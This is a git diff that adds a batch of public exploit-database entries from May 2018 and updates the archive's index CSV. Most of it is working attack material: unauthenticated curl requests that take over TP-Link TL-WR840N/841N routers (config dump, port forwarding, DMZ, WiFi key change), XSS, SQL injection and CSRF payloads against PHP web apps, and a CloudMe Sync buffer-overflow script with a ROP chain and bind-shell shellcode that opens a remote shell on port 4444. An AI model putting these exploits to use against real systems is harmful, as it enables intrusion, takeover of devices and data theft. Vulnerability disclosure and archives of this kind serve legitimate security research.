diff --git a/exploits/hardware/webapps/44781.txt b/exploits/hardware/webapps/44781.txt new file mode 100644 index 000000000..5c885c857 --- /dev/null +++ b/exploits/hardware/webapps/44781.txt @@ -0,0 +1,207 @@ +Title: TP-Link Multiple Router(TL-WR840N and TL-WR841N) Unauthenticated +Router Access Vulnerability +Author: BlackFog Team +Date: 27 May 2018 +Website: SecureLayer7.net +Contact: info@securelayer7.net + +Version: 0.9.1 4.16 v0001.0 Build 170622 Rel.64334n +Hardware: TL-WR841N v13 00000013 + +Version : Firmware Version: 0.9.1 3.16 v0001.0 Build 170608 Rel.58696n +Hardware Version: TL-WR840N v5 00000005 + +Vendor Description: TP-Link is the world's #1 provider of consumer WiFi +networking devices, shipping products to over 120 countries and hundreds of +millions of customers. (source https://www.tp-link.com/) + + +Attack Description : +This issue is caused by improper session handling on /cgi/ Folder or /cgi +file found by Touhid Shaikh(BlackFog Team Member). + +if any attacker sends Referer Header with its request and sets Referer: +http://192.168.0.1/mainFrame.htm dan its no authentication required and an +attacker can do router's action without authentication. +below are some of few examples you can see. But the attacker can do mostly +all of the action on a router without Authentication. + +NOTE: Except admin's password change bcz its required current password for +changing + +##### POC ###### +----------------------- Fail attempt ------------------------- +root@linux:/workspace# curl -i -s -k -X GET http://192.168.0.1/cgi/conf.bin +HTTP/1.1 403 Forbidden +Content-Type: text/html; charset=utf-8 +Content-Length: 106 +Connection: close + +403 Forbidden

403 +Forbidden

+ +----------------------------------------------------- + +--------------- Seccessfull attempt -------------------------------- +root@linux:/workspace# curl -i -s -k -X GET -H "Referer: +http://192.168.0.1/mainFrame.htm" http://192.168.0.1/cgi/conf.bin +HTTP/1.1 200 OK +Content-Type: application/octet-stream; charset=utf-8 +Content-Length: 5984 +Connection: keep-alive + +root@linux:/workspace# curl -s -k -X GET -H "Referer: +http://192.168.0.1/mainFrame.htm" http://192.168.0.1/cgi/conf.bin > +backup.bin +root@linux:/workspace# file backup.bin +backup.bin: data +root@linux:/workspace# ls -la backup.bin +-rw-r--r-- 1 root root 5720 Mar 30 17:17 backup.bin + +---------------------------------------------------- +##### POC END ###### + + +Evil Actions Without Authentication example. +============== Burp Request and curl command for conf.bin or backup file +================= + + +####### Burp ######## +GET /cgi/conf.bin HTTP/1.1 +Host: 192.168.0.1 +User-Agent: Agent22 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Referer: http://192.168.0.1/mainFrame.htm +Connection: close +Upgrade-Insecure-Requests: 1 + +-------Response-------- +HTTP/1.1 200 OK +Content-Type: application/octet-stream; charset=utf-8 +Content-Length: 5720 +Connection: close + +w@\ÝÓb êLýªïÀ‡ÉE‹ûaɬ,*-àh[Ú‹³lÙ€ÍÁ.©- +.....SKIP....... 
+8/����W + + +######## Curl ########## +curl -i -s -k -X $'GET' -H $'Host: 192.168.0.1' -H $'User-Agent: +Agent22' -H $'Accept: +text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8' -H +$'Accept-Language: en-US,en;q=0.5' -H $'Accept-Encoding: gzip, deflate' -H +$'Referer: http://192.168.0.1/mainFrame.htm' -H $'Connection: close' $' +http://192.168.0.1/cgi/conf.bin' > backup.bin + +------ take a look in backup.bin file -------- + +=========================================== + + + +=========== Add Port Forwarding ============ +curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent: +Mozilla/Agent22" -H 'Accept: */*' -H "Referer: +http://192.168.0.1/mainFrame.htm" --data-binary +$'[IP_CONN_PORTTRIGGERING#0,0,0,0,0,0#1,1,2,0,0,0]0,5\x0d\x0atriggerPort=23\x0d\x0atriggerProtocol=TCP +or UDP\x0d\x0aopenProtocol=TCP or +UDP\x0d\x0aenable=1\x0d\x0aopenPort=23\x0d\x0a' http://192.168.0.1/cgi?3 + +HTTP/1.1 200 OK +Content-Type: text/plain; charset=utf-8 +Transfer-Encoding: chunked +Connection: keep-alive + +[1,1,2,7,0,0]0 +triggerPort=23 +triggerProtocol=TCP or UDP +openProtocol=TCP or UDP +enable=1 +openPort=23 +[error]0 + +----- Decription ----- +enable=0 is for disable +enable=1 is for enable +u can change port also. 
+==================================== + + + +=========== Reboot Router ========================= +curl -i -s -k -X POST -H "Host: 192.168.0.1" -H "User-Agent: +Mozilla/Agent22" -H 'Accept: */*' -H "Referer: +http://192.168.0.1/mainFrame.htm" --data-binary +$'[ACT_REBOOT#0,0,0,0,0,0#0,0,0,0,0,0]0,0\x0d\x0a' http://192.168.0.1/cgi?7 + +HTTP/1.1 200 OK +Content-Type: text/plain; charset=utf-8 +Transfer-Encoding: chunked +Connection: keep-alive + +[error]0 + +----Description ----- +error = 0 means reboot seccessully +====================================== + + + +============= Enable Guest Network ========================== +curl -i -s -k -X $'POST' -H $'Host: 192.168.0.1' -H $'User-Agent: Aent22' +-H $'Accept: */*' -H $'Accept-Language: en-US,en;q=0.5' -H +$'Accept-Encoding: gzip, deflate' -H $'Content-Type: text/plain' -H +$'Referer: http://192.168.0.1/mainFrame.htm' -H $'Content-Length: 844' -H +$'Connection: close' --data-binary +$'[LAN_WLAN_MULTISSID#1,1,0,0,0,0#0,0,0,0,0,0]0,1\x0d\x0amultiSSIDEnable=1\x0d\x0a[LAN_WLAN_MSSIDENTRY#1,1,1,0,0,0#0,0,0,0,0,0]1,11\x0d\x0aIsolateClients=0\x0d\x0aEnable=1\x0d\x0aSSID=Agent22\x0d\x0aBeaconType=WPAand11i\x0d\x0aWPAAuthenticationMode=PSKAuthentication\x0d\x0aWPAEncryptionModes=TKIPandAESEncryption\x0d\x0aIEEE11iAuthenticationMode=PSKAuthentication\x0d\x0aIEEE11iEncryptionModes=TKIPandAESEncryption\x0d\x0aPreSharedKey=9876543210\x0d\x0aGroupKeyUpdateInterval=0\x0d\x0aMaxStaNum=32\x0d\x0a[LAN_WLAN_MSSIDENTRY#1,2,1,0,0,0#0,0,0,0,0,0]2,1\x0d\x0aIsolateClients=0\x0d\x0a[LAN_WLAN_GUESTNET#1,1,0,0,0,0#0,0,0,0,0,0]3,8\x0d\x0aLANAccessEnable=1\x0d\x0aUSBAccessEnable=0\x0d\x0aTCEnable=0\x0d\x0aTCMinUpBW=100\x0d\x0aTCMaxUpBW=200\x0d\x0aTCMinDownBW=100\x0d\x0aTCMaxDownBW=200\x0d\x0alastModified=1\x0d\x0a[LAN_WLAN_GUESTNET#1,2,0,0,0,0#0,0,0,0,0,0]4,8\x0d\x0aLANAccessEnable=1\x0d\x0aUSBAccessEnable=0\x0d\x0aTCEnable=0\x0d\x0aTCMinUpBW=100\x0d\x0aTCMaxUpBW=200\x0d\x0aTCMinDownBW=100\x0d\x0aTCMaxDownBW=200\x0d\x0alastModified=0\x0d\x0a' 
+$'http://192.168.0.1/cgi?2&2&2&2&2' + +------- Description ---------- +SSID=Agent22 +PreSharedKey=9876543210 +============================================= + + + +======= DMZ enable and Disable on 192.168.0.112 =========== +curl -i -s -k -X $'POST' -H $'Host: 192.168.0.1' -H $'User-Agent: +Agent22' -H $'Referer: http://192.168.0.1/mainFrame.htm' -H +$'Content-Length: 78' -H $'Connection: close' --data-binary +$'[DMZ_HOST_CFG#0,0,0,0,0,0#0,0,0,0,0,0]0,2\x0d\x0aenable=1\x0d\x0aIPAddress=192.168.0.112\x0d\x0a' + $'http://192.168.0.1/cgi?2' + +HTTP/1.1 200 OK +Content-Type: text/plain; charset=utf-8 +Transfer-Encoding: chunked +Connection: close + +[error]0 + +-------Description ----------- +IPAddress=192.168.0.112 +enable=1 or 0 (enable or disable) +================================================= + +=============== WiFi Password Change ============= +curl -i -s -k -X $'POST' -H $'Host: 192.168.0.1' -H $'User-Agent: +Agent22' -H $'Accept-Encoding: gzip, deflate' -H $'Content-Type: +text/plain' -H $'Referer: http://192.168.0.1/mainFrame.htm' -H +$'Content-Length: 199' -H $'Connection: close' --data-binary +$'[LAN_WLAN#1,1,0,0,0,0#0,0,0,0,0,0]0,5\x0d\x0aBeaconType=11i\x0d\x0aIEEE11iAuthenticationMode=PSKAuthentication\x0d\x0aIEEE11iEncryptionModes=AESEncryption\x0d\x0aX_TP_PreSharedKey=9876543210\x0d\x0aX_TP_GroupKeyUpdateInterval=0\x0d\x0a' + $'http://192.168.0.1/cgi?2' + +-------Description ----------- +IEEE11iAuthenticationMode=PSKAuthentication +IEEE11iEncryptionModes=AESEncryption +X_TP_PreSharedKey=9876543210 +=============================== + + + +======= Report Timeline ============= +30 Mar, 2018 ----- Initial Report (support.in@tp-link.com) (No Response) +27 May, 2018 ----- Full Disclosure \ No newline at end of file diff --git a/exploits/php/webapps/44782.txt b/exploits/php/webapps/44782.txt new file mode 100644 index 000000000..7032fc380 --- /dev/null +++ b/exploits/php/webapps/44782.txt 
@@ -0,0 +1,11 @@
+# Exploit Title: DomainMod v4.09.03 has XSS via the assets/edit/account-owner.php oid parameter
+# Date: 2018-05-28
+# Exploit Author: longer(76439392@qq.com)
+# Vendor Homepage: domainmod (https://github.com/domainmod/domainmod)
+# Software Link: domainmod (https://github.com/domainmod/domainmod)
+# Version: v4.09.03
+# CVE : CVE-2018-11403
+
+An issue was discovered in DomainMod v4.09.03.(https://github.com/domainmod/domainmod/issues/63)
+After the user logged in, open the url :
+http://127.0.0.1/assets/edit/account-owner.php?del=1&oid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28973761%29%3C/ScRiPt%3E
\ No newline at end of file
diff --git a/exploits/php/webapps/44783.txt b/exploits/php/webapps/44783.txt
new file mode 100644
index 000000000..4a0f49ba6
--- /dev/null
+++ b/exploits/php/webapps/44783.txt
@@ -0,0 +1,11 @@
+# Exploit Title: DomainMod v4.09.03 has XSS via the assets/edit/ssl-provider-account.php sslpaid parameter
+# Date: 2018-05-28
+# Exploit Author: longer(76439392@qq.com)
+# Vendor Homepage: domainmod (https://github.com/domainmod/domainmod)
+# Software Link: domainmod (https://github.com/domainmod/domainmod)
+# Version: v4.09.03
+# CVE : CVE-2018-11404
+
+An issue was discovered in DomainMod v4.09.03.(https://github.com/domainmod/domainmod/issues/63)
+After the user logged in, open the url:
+http://127.0.0.1/assets/edit/ssl-provider-account.php?del=1&sslpaid=%27%22%28%29%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt%28931289%29%3C/ScRiPt%3E
\ No newline at end of file
diff --git a/exploits/php/webapps/44785.txt b/exploits/php/webapps/44785.txt
new file mode 100644
index 000000000..dcca1c669
--- /dev/null
+++ b/exploits/php/webapps/44785.txt
@@ -0,0 +1,55 @@
+# Exploit Title: Wordpress Plugin Events Calendar - SQL Injection
+# Dork: N/A
+# Date: 2018-05-27
+# Exploit Author: Özkan Mustafa Akkuş (AkkuS)
+# Vendor: Wachipi
+# Vendor Homepage: https://codecanyon.net/item/wp-events-calendar-plugin/5025660
+# Version: 1.0
+# Category: Webapps
+# Tested on: Kali linux
+# Description : An attacker can perform attacks via calendar ajax queries.
+# However, this plugin is fully PHP-enabled. You can run SQL query with
+# "month" and "year" parameters.
+# These parameters are also suitable for XSS attacks.
+# All PHP queries for which these parameters work have the same vulnerable.
+
+# "getBookingForm.php, getMonthCalendar.php, getEventsList.php"
+# Demo : http://www.checkingarea.com/EVENTS_WP/
+# PoC : SQLi :
+# GET
+/EVENTS_WP/wp-content/plugins/wp-events-calendar/public/ajax/getEventsList.php?year=2018&month=5&day=1&calendar_id=1&pag=1
+
+
+
+# Parameter: month (GET)
+# Type: boolean-based blind
+# Title: AND boolean-based blind - WHERE or HAVING clause
+# Payload:
+year=2018&month=5' AND 7958=7958 AND 'FXnO'='FXnO&day=1&calendar_id=1&pag=1
+
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload:
+year=2018&month=5' AND SLEEP(5) AND 'MmZz'='MmZz&day=1&calendar_id=1&pag=1
+
+# Type: UNION query
+# Title: MySQL UNION query (NULL) - 29 columns
+# Payload:
+year=2018&month=5' UNION ALL SELECT NULL,NULL,CONCAT&day=1&calendar_id=1&pag=1(0x71786a7171,0x424e507748695862436e774c4a4d664a7751424c537678554656465a464b7074685051527676756e,0x7178707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&calendar_id=1
+
+# Parameter: year (GET)
+# Type: boolean-based blind
+# Title: OR boolean-based blind - WHERE or HAVING clause (MySQL comment)
+# Payload:
+year=-8454' OR 7997=7997#&month=5&day=1&calendar_id=1&pag=1
+
+# Type: AND/OR time-based blind
+# Title: MySQL >= 5.0.12 AND time-based blind
+# Payload:
+year=2018' AND SLEEP(5)--
+uTJs&month=5&day=1&calendar_id=1&pag=1
+
+# Type: UNION query
+# Title: MySQL UNION query (NULL) - 29 columns
+# Payload:
+year=2018' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x71786a7171,0x7766694a50504a425a6e635a564b5172674c745770414e4f46494977475a44626b416a6c797a674b,0x7178707071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&month=5&day=1&calendar_id=1&pag=1
\ No newline at end of file
diff --git a/exploits/php/webapps/44786.txt b/exploits/php/webapps/44786.txt
new file mode 100644
index 000000000..4922216a1
--- /dev/null
+++ b/exploits/php/webapps/44786.txt
@@ -0,0 +1,31 @@
+# Exploit Title: Joomla! extension Full Social 1.1.0 - 'search_query' SQL
+Injection
+# Date: 2018-05-28
+# Exploit Author: L0RD or borna.nematzadeh123@gmail.com
+# Software Link: https://extensions.joomla.org/extension/full-social/
+# Vendor Homepage: https://www.joomlaextensions.co.in/
+# Version: 1.1.0
+# Tested on: Win 10
+===================================================
+# POC : SQLi
+
+# Parameter : search_query
+# Type : Time-based blind
+# Payload : 1%' AND SLEEP(10)%23
+
+# Request
+============
+GET
+/en/search?controller=search&orderby=position&orderway=desc&search_query=1%25%27+AND+SLEEP%2810%29%23&submit_search=
+HTTP/1.1
+Host: www.site.com
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:61.0)
+Gecko/20100101 Firefox/61.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Referer: http://www.site.com/en/
+Connection: keep-alive
+Upgrade-Insecure-Requests: 1
+
+===================================================
\ No newline at end of file
diff --git a/exploits/php/webapps/44788.html b/exploits/php/webapps/44788.html
new file mode 100644
index 000000000..4032dd3e4
--- /dev/null
+++ b/exploits/php/webapps/44788.html
@@ -0,0 +1,61 @@ +# Exploit Title: Joomla! extension jCart for OpenCart 2.3.0.2 - Cross site request forgery +# Date: 2018-05-28 +# Exploit Author: L0RD or borna.nematzadeh123@gmail.com +# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/e-commerce-integrations/jcart-for-opencart/ +# Vendor Homepage: https://www.joomlaextensions.co.in/ +# Version: 2.3.0.2 +# Tested on: Kali linux +=================================================== + +# POC : + +# Change user information exploit : + + + +
+ + + + +
+ + + + + +# Change password exploit : + +
+ + +
+ + + +# Change affiliate account information exploit : + +
+ + + + + + + + + + + +
+ + +==================================================== \ No newline at end of file diff --git a/exploits/php/webapps/44789.html b/exploits/php/webapps/44789.html new file mode 100644 index 000000000..f35008609 --- /dev/null +++ b/exploits/php/webapps/44789.html @@ -0,0 +1,40 @@ +# Exploit Title: Joomla! extension JoomOCShop 1.0 - Cross site request forgery +# Date: 2018-05-28 +# Exploit Author: L0RD or borna.nematzadeh123@gmail.com +# Software Link: https://extensions.joomla.org/extensions/extension/e-commerce/e-commerce-integrations/joomocshop/ +# Vendor Homepage: https://www.joomlaextensions.co.in/ +# Version: 1.0 +# Tested on: Kali linux +=================================================== + +# POC : + +# Change user information exploit : + + + +
+ + + + + +
+ + + + + +# Change password exploit : + +
+ + +
+ + +==================================================== \ No newline at end of file diff --git a/exploits/php/webapps/44790.txt b/exploits/php/webapps/44790.txt new file mode 100644 index 000000000..1cd2518ac --- /dev/null +++ b/exploits/php/webapps/44790.txt @@ -0,0 +1,34 @@ +# Exploit Title: wityCMS 0.6.1 Persistent XSS on "Website's name" field +# Date: 05/28/2018 +# Exploit Author: Nathu Nandwani +# Website: http://nandtech.co/ +# Vendor Homepage: https://creatiwity.net/witycms +# Software Link: https://github.com/Creatiwity/wityCMS/releases/tag/0.6.1 +# Version: 0.6.1 +# Tested on: Windows 10 x64 (XAMPP, Chrome) +# CVE: CVE-2018-11512 + +*Description + +A persistent/stored cross-site scripting (XSS) vulnerability in the "Website's name" field found in the "Settings" page under the "General" menu in Creatiwity wityCMS 0.6.1 allows remote attackers to inject arbitrary web script or HTML via a crafted website name by doing an authenticated POST HTTP request to admin/settings/general. + +*Proof of Concept + +1. Attacker logs in as an administrator of the site. +2. Attacker visits the Administrator page and clicks on the general options then settings menu. +3. Attacker enters the script below in the "Website's name" field: +pt>alert(1)pt> +Note: The "script" tag is being filtered but not recursively so having the first tag stripped off will still execute the one being combined. +3. Once the "Save" button is clicked, the payload will execute. +4. When an unauthenticated user visits the home page, the payload will also execute. + +*Mitigation + +See https://github.com/Creatiwity/wityCMS/commit/7967e5bf15b4d2ee6b85b56e82d7e1229147de44 + +Timeline + +2018-05-27-Vulnerability reported to wityCMS development team +2018-05-27-CVE requested from mitre.org +2018-05-28-wityCMS development team acknowledges and will be pushing the fix for production on 0.6.2 +2015-05-28-CVE published by mitre: https://twitter.com/CVEnew/status/1001093385929805831 \ No newline at end of file 
diff --git a/exploits/windows_x86-64/remote/44784.py b/exploits/windows_x86-64/remote/44784.py
new file mode 100755
index 000000000..93a35e740
--- /dev/null
+++ b/exploits/windows_x86-64/remote/44784.py
@@ -0,0 +1,140 @@ +# Exploit: CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass) +# Date: 2018-05-27 +# Author: Juan Prescotto +# Tested Against: Win7 Pro SP1 64 bit +# Software Download: https://www.cloudme.com/downloads/CloudMe_1109.exe +# Tested Against Version: 1.10.9 +# Special Thanks to my wife for allowing me spend countless hours on this passion of mine +# Credit: Thanks to John Page (aka hyp3rlinx) (https://www.exploit-db.com/exploits/44027/) +# for his work on the original exploit + +# Bad Characers: \x00 +# SEH Offset: 2236 +# Non-Participating Modules Used: Qt5Gui.dll, Qt5Core.dll,libstdc++-6.dll, libgcc_s_dw2-1.dll, libwinpthread-1.dll + +# Victim Machine: +# C:\>netstat -nao | find "8888" +# TCP 0.0.0.0:8888 0.0.0.0:0 LISTENING 2640 +# C:\>tasklist | find "2640" +# CloudMe.exe 2640 Console 1 36,632 K + +# Attacking Machine: +# root@kali:~/Desktop# python cloudme.py +# CloudMe Sync v1.10.9 Buffer Overflow with DEP Bypass +# [+] CloudMe Target IP> 192.168.12.4 +# Sending buffer overflow to CloudMe Service +# Target Should be Running a Bind Shell on Port 4444! + +# root@kali:~/Desktop# nc -nv 192.168.12.4 4444 +# (UNKNOWN) [192.168.12.4] 4444 (?) open +# Microsoft Windows [Version 6.1.7601] +# Copyright (c) 2009 Microsoft Corporation. All rights reserved. 
+ +# C:\Users\jprescotto\AppData\Local\Programs\CloudMe\CloudMe> +# My register setup when VirtualProtect() is called (Defeat DEP) : + -- +# EAX = NOP (0x90909090) +# ECX = lpOldProtect (ptr to W address) +# EDX = NewProtect (0x40) +# EBX = dwSize +# ESP = lPAddress (automatic) +# EBP = ReturnTo (ptr to jmp esp) +# ESI = ptr to VirtualProtect() +# EDI = ROP NOP (RETN) + +#!/usr/bin/python + +import socket,struct + +print 'CloudMe Sync v1.10.9 Buffer Overflow with DEP Bypass' + +def create_rop_chain(): + + rop chain generated with mona.py - www.corelan.be + rop_gadgets = [ + 0x61d1e7fe, POP ECX RETN [Qt5Gui.dll] + 0x690398a8, ptr to &VirtualProtect() [IAT Qt5Core.dll] + 0x6fe70610, MOV EAX,DWORD PTR DS:[ECX] RETN [libstdc++-6.dll] + 0x61c40a6f, XCHG EAX,ESI RETN [Qt5Gui.dll] + 0x68c8ea5a, POP EBP RETN [Qt5Core.dll] + 0x68d652e1, & call esp [Qt5Core.dll] + 0x68fa7ca2, POP EDX RETN [Qt5Core.dll] + 0xfffffdff, Value to negate, will become 0x00000201 + 0x6eb47092, NEG EDX RETN [libgcc_s_dw2-1.dll] + 0x68d52747, POP EBX RETN [Qt5Core.dll] + 0xffffffff, + 0x68f948bc, INC EBX RETN [Qt5Core.dll] + 0x68f8063c, ADD EBX,EDX ADD AL,0A RETN [Qt5Core.dll] + 0x68f9a472, POP EDX RETN [Qt5Core.dll] + 0xffffffc0, Value to negate, will become 0x00000040 + 0x6eb47092, NEG EDX RETN [libgcc_s_dw2-1.dll] + 0x61f057ab, POP ECX RETN [Qt5Gui.dll] + 0x6eb5efa3, &Writable location [libgcc_s_dw2-1.dll] + 0x61dc14d1, POP EDI RETN [Qt5Gui.dll] + 0x64b4ed0c, RETN (ROP NOP) [libwinpthread-1.dll] + 0x61ba6245, POP EAX RETN [Qt5Gui.dll] + 0x90909090, nop + 0x61b45ea3, PUSHAD RETN [Qt5Gui.dll] + ] + return ''.join(struct.pack(' show options +#Module options (payload/windows/shell_bind_tcp): +# Name Current Setting Required Description +# EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none) +# LPORT 4444 yes The listen port +# RHOST no The target address +#msf payload(shell_bind_tcp) > generate -b '\x00' -t py +# windows/shell_bind_tcp - 355 bytes +# http://www.metasploit.com 
+# Encoder: x86/shikata_ga_nai + +shellcode = "" +shellcode += "\xda\xcf\xba\x8c\x90\x7b\x70\xd9\x74\x24\xf4\x5e\x33" +shellcode += "\xc9\xb1\x53\x31\x56\x17\x83\xee\xfc\x03\xda\x83\x99" +shellcode += "\x85\x1e\x4b\xdf\x66\xde\x8c\x80\xef\x3b\xbd\x80\x94" +shellcode += "\x48\xee\x30\xde\x1c\x03\xba\xb2\xb4\x90\xce\x1a\xbb" +shellcode += "\x11\x64\x7d\xf2\xa2\xd5\xbd\x95\x20\x24\x92\x75\x18" +shellcode += "\xe7\xe7\x74\x5d\x1a\x05\x24\x36\x50\xb8\xd8\x33\x2c" +shellcode += "\x01\x53\x0f\xa0\x01\x80\xd8\xc3\x20\x17\x52\x9a\xe2" +shellcode += "\x96\xb7\x96\xaa\x80\xd4\x93\x65\x3b\x2e\x6f\x74\xed" +shellcode += "\x7e\x90\xdb\xd0\x4e\x63\x25\x15\x68\x9c\x50\x6f\x8a" +shellcode += "\x21\x63\xb4\xf0\xfd\xe6\x2e\x52\x75\x50\x8a\x62\x5a" +shellcode += "\x07\x59\x68\x17\x43\x05\x6d\xa6\x80\x3e\x89\x23\x27" +shellcode += "\x90\x1b\x77\x0c\x34\x47\x23\x2d\x6d\x2d\x82\x52\x6d" +shellcode += "\x8e\x7b\xf7\xe6\x23\x6f\x8a\xa5\x2b\x5c\xa7\x55\xac" +shellcode += "\xca\xb0\x26\x9e\x55\x6b\xa0\x92\x1e\xb5\x37\xd4\x34" +shellcode += "\x01\xa7\x2b\xb7\x72\xee\xef\xe3\x22\x98\xc6\x8b\xa8" +shellcode += "\x58\xe6\x59\x44\x50\x41\x32\x7b\x9d\x31\xe2\x3b\x0d" +shellcode += "\xda\xe8\xb3\x72\xfa\x12\x1e\x1b\x93\xee\xa1\x32\x38" +shellcode += "\x66\x47\x5e\xd0\x2e\xdf\xf6\x12\x15\xe8\x61\x6c\x7f" +shellcode += "\x40\x05\x25\x69\x57\x2a\xb6\xbf\xff\xbc\x3d\xac\x3b" +shellcode += "\xdd\x41\xf9\x6b\x8a\xd6\x77\xfa\xf9\x47\x87\xd7\x69" +shellcode += "\xeb\x1a\xbc\x69\x62\x07\x6b\x3e\x23\xf9\x62\xaa\xd9" +shellcode += "\xa0\xdc\xc8\x23\x34\x26\x48\xf8\x85\xa9\x51\x8d\xb2" +shellcode += "\x8d\x41\x4b\x3a\x8a\x35\x03\x6d\x44\xe3\xe5\xc7\x26" +shellcode += "\x5d\xbc\xb4\xe0\x09\x39\xf7\x32\x4f\x46\xd2\xc4\xaf" +shellcode += "\xf7\x8b\x90\xd0\x38\x5c\x15\xa9\x24\xfc\xda\x60\xed" +shellcode += "\x1c\x39\xa0\x18\xb5\xe4\x21\xa1\xd8\x16\x9c\xe6\xe4" +shellcode += "\x94\x14\x97\x12\x84\x5d\x92\x5f\x02\x8e\xee\xf0\xe7" +shellcode += "\xb0\x5d\xf0\x2d" + +ip=raw_input('[+] CloudMe Target IP> ') + 
+stack_pivot=struct.pack(' rop_chain) : SUB ESP,8 ADD ESP,0D8C POP EBX POP ESI POP EDI POP EBP RETN 0x08 ** [Qt5Gui.dll] ** | {PAGE_EXECUTE_READ} +rop_nop1=struct.pack('Preference->Security->New password &Confirm password' + +#seh- 0041A6EF "\xEF\xA6\x41" +#address to jump 0012FA7A +#nseh- "\xEB\xAC\x90\x90" +#winexec address 0x7c862aed + +#!/usr/bin/python + +shellcode=("\x33\xC0" +"\x50" +"\x68\x63\x61\x6C\x63" +"\x8B\xC4" +"\x50" +"\xE8\x61\x30\x73\x7C") + +buf="\x90"*4 + shellcode + "\x90"*(80-len(shellcode)) + "\xEB\xAC\x90\x90" + "\xEF\xA6\x41" + +f=open("alftp.txt","w") +f.write(buf) +f.close() \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 6daef7c49..2b3689d22 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -9745,6 +9745,7 @@ id,file,description,date,author,type,platform,port 44745,exploits/windows/local/44745.txt,"Flash ActiveX 28.0.0.137 - Code Execution (2)",2016-02-13,smgorelik,local,windows, 44750,exploits/linux/local/44750.txt,"GNU glibc < 2.27 - Local Buffer Overflow",2018-05-24,JameelNabbo,local,linux, 44776,exploits/android/local/44776.txt,"Werewolf Online 0.8.8 - Information Disclosure",2018-05-27,ManhNho,local,android, +44787,exploits/windows_x86/local/44787.py,"ALFTP 5.31 - Local Buffer Overflow (SEH Bypass)",2018-05-28,"Gokul Babu",local,windows_x86, 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139 
@@ -16528,6 +16529,7 @@ id,file,description,date,author,type,platform,port
 44656,exploits/multiple/remote/44656.txt,"mySCADA myPRO 7 - Hard-Coded Credentials",2018-05-20,"Emre ÖVÜNÇ",remote,multiple,
 44760,exploits/hardware/remote/44760.rb,"D-Link DSL-2750B - OS Command Injection (Metasploit)",2018-05-25,Metasploit,remote,hardware,
 44779,exploits/hardware/remote/44779.txt,"Bitmain Antminer D3/L3+/S9 - Remote Command Execution",2018-05-27,CorryL,remote,hardware,
+44784,exploits/windows_x86-64/remote/44784.py,"CloudMe Sync < 1.11.0 - Buffer Overflow (SEH) (DEP Bypass)",2018-05-28,"Juan Prescotto",remote,windows_x86-64,
 6,exploits/php/webapps/6.php,"WordPress 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php,
 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php,
 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,
@@ -39442,7 +39444,7 @@ id,file,description,date,author,type,platform,port
 44765,exploits/php/webapps/44765.txt,"EasyService Billing 1.0 - 'q' SQL Injection",2018-05-26,"Divya Jain",webapps,php,
 44766,exploits/php/webapps/44766.txt,"mySurvey 1.0 - 'id' SQL Injection",2018-05-26,AkkuS,webapps,php,
 44767,exploits/php/webapps/44767.txt,"easyLetters 1.0 - 'id' SQL Injection",2018-05-26,AkkuS,webapps,php,
-44769,exploits/php/webapps/44769.txt,"Wordpress Plugin Events Calendar - SQL Injection / Cross-Site Scripting",2018-05-27,AkkuS,webapps,php,
+44769,exploits/php/webapps/44769.txt,"Wordpress Plugin Booking Calendar 3.0.0 - SQL Injection / Cross-Site Scripting",2018-05-27,AkkuS,webapps,php,
 44770,exploits/php/webapps/44770.txt,"Ingenious School Management System - 'id' SQL Injection",2018-05-27,"Meisam Monsef",webapps,php,
 44771,exploits/php/webapps/44771.html,"Sharetronix CMS 3.6.2 - Cross-Site Request Forgery / Cross-Site Scripting",2018-05-27,"Hesam Bazvand",webapps,php,
 44772,exploits/php/webapps/44772.txt,"Lyrist - 'id' SQL Injection",2018-05-27,"Meisam Monsef",webapps,php,
@@ -39451,3 +39453,11 @@ id,file,description,date,author,type,platform,port
 44775,exploits/php/webapps/44775.txt,"ClipperCMS 1.3.3 - Cross-Site Scripting",2018-05-27,"Nathu Nandwani",webapps,php,
 44777,exploits/php/webapps/44777.txt,"My Directory 2.0 - SQL Injection / Cross-Site Scripting",2018-05-27,AkkuS,webapps,php,
 44778,exploits/php/webapps/44778.txt,"Baby Names Search Engine 1.0 - 'a' SQL Injection",2018-05-27,AkkuS,webapps,php,
+44781,exploits/hardware/webapps/44781.txt,"TP-Link TL-WR840N/TL-WR841N - Authenticaton Bypass",2018-05-28,"BlackFog Team",webapps,hardware,
+44782,exploits/php/webapps/44782.txt,"DomainMod 4.09.03 - 'oid' Cross-Site Scripting",2018-05-28,longer,webapps,php,
